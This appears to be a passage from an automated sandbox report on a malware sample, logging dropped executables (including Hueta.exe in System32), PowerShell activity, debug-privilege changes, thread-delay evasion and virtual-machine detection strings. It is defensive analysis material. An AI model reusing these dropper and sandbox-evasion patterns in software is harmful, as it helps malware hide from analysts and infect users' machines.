Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE1FD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	File created: C:\Users\user\AppData\Local\Temp\gr0D62WdkfOXqpbHbRHp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\6ff0d56ce15b47fcb2f8c73e3a3af1d7$dpx$.tmp\3b4007d200875d4c9c58c44073469727.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	File created: C:\Windows\System32\Hueta.exe	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\Hueta.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5325			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4240			Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIE1FD.tmp			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gr0D62WdkfOXqpbHbRHp			Jump to dropped file

Source: C:\Windows\System32\msiexec.exe TID: 5200	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5348	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 4872	Thread sleep time: -90000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: chrome.exe, 00000000.00000002.1952278977.00000166840CF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor3+f
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual ProcessorHINE
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 2Hyper-V VM Vid Partitiondll
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.1952278977.00000166840B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: X2Hyper-V VM Vid Partition
Source: chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Partitionl
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes7
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisort
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940356506.0000020DCBD60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=2
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: DHyper-V Virtual Machine Bus Pipes
Source: chrome.exe, 00000000.00000002.1952278977.00000166840CF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisor
Source: chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical Processormuis
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical Processorsyss
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V VM Vid Partition
Source: Hueta.exe, 0000001C.00000002.1636324703.0000020D26D34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V srqqnintjgmhtmg BusXS
Source: chrome.exe, 00000000.00000002.1952278977.00000166840F1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V srqqnintjgmhtmg Bus Pipes
Source: chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Serviceb
Source: 0xBKHFISYHPX.exe, 00000019.00000000.1613205512.00007FF70A42C000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: vmware
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes\f%
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V VM Vid PartitionH
Source: chrome.exe, 00000000.00000002.1952278977.00000166840B4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor
Source: 0xBKHFISYHPX.exe, 00000019.00000000.1613205512.00007FF70A42C000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: bad conversionvirtualvmwareoracleinnotekAuthenticAMDGenuineIntelManufacturerselect * from Win32_BIOSSMBIOSBIOSVersion\\?\c:\
Source: chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Partition`f1

Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: chrome.exe, 00000000.00000002.1949754837.0000016680DB1000.00000002.00000001.00040000.00000008.sdmp	Binary or memory string: Shell_TrayWnd
Source: chrome.exe, 00000000.00000002.1949754837.0000016680DB1000.00000002.00000001.00040000.00000008.sdmp	Binary or memory string: Progman
Source: chrome.exe, 00000000.00000002.1949754837.0000016680DB1000.00000002.00000001.00040000.00000008.sdmp	Binary or memory string: RProgram Manager

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4111.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.22621.4036.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
